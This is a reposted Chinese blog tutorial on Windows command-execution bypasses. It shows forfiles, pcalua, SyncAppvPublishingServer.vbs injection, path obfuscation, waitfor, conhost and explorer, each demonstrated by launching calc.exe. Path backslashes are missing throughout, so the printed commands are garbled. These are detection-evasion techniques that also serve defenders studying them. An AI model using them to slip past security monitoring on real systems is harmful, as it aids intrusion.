當(dāng)前位置：首頁(yè) > 编程资源 > 综合教程 >内容正文

综合教程

windows命令绕过

發(fā)布時(shí)間：2023/12/15 综合教程 46 生活家

生活随笔收集整理的這篇文章主要介紹了 windows命令绕过小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

windows命令繞過(guò)

forfies

使用方式如下：

實(shí)際使用：
forfiles /c c:windowssystem32calc.exe

確認(rèn)任務(wù)的父進(jìn)程為forfiles.exe

pcalua

實(shí)際使用：
pcalua.exe -a c:windowssystem32calc.exe

主進(jìn)程就是運(yùn)行的進(jìn)程

SyncAppvPublishingServer

確認(rèn)powershell版本：
powershell $PSVersionTable.PSVersion

網(wǎng)上說(shuō)powershell2版本無(wú)法運(yùn)行，但這邊實(shí)際操作發(fā)現(xiàn)是可以運(yùn)行成功的（盡管有報(bào)錯(cuò)）

實(shí)際使用：
powershell SyncAppvPublishingServer.vbs "n; Start-Process c:windowssystem32calc.exe"

路徑混淆

實(shí)際使用：
cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"

相關(guān)解釋如下：

waitfor

這里通過(guò)waitfor的發(fā)送信號(hào)或者等待信號(hào)執(zhí)行命令
實(shí)際使用：
waitfor test && C:WindowsSystem32calc.exe
// test為信號(hào)的名稱
waitfor /s 127.0.0.1 /si test

conhost

windows 7 和 Windows server 2008 中引進(jìn)的新的控制臺(tái)應(yīng)用程序處理機(jī)制
實(shí)際使用：
conhost C:WindowsSystem32calc.exe

explorer

其實(shí)也就是Windows系統(tǒng)的文件資源管理器，桌面或者從我的電腦中啟動(dòng)程序都是通過(guò)explorer.exe
實(shí)際使用：
explorer.exe C:WindowsSystem32calc.exe
explorer.exe /root,"C:WindowsSystem32calc.exe"
explorer.exe test, "C:WindowsSystem32calc.exe"

聯(lián)系郵箱：yang_s1r@163.com
博客園地址：https://www.cnblogs.com/Yang34/

總結(jié)

以上是生活随笔為你收集整理的windows命令绕过的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： java date 转integer_j
下一篇：家具网上商城有哪些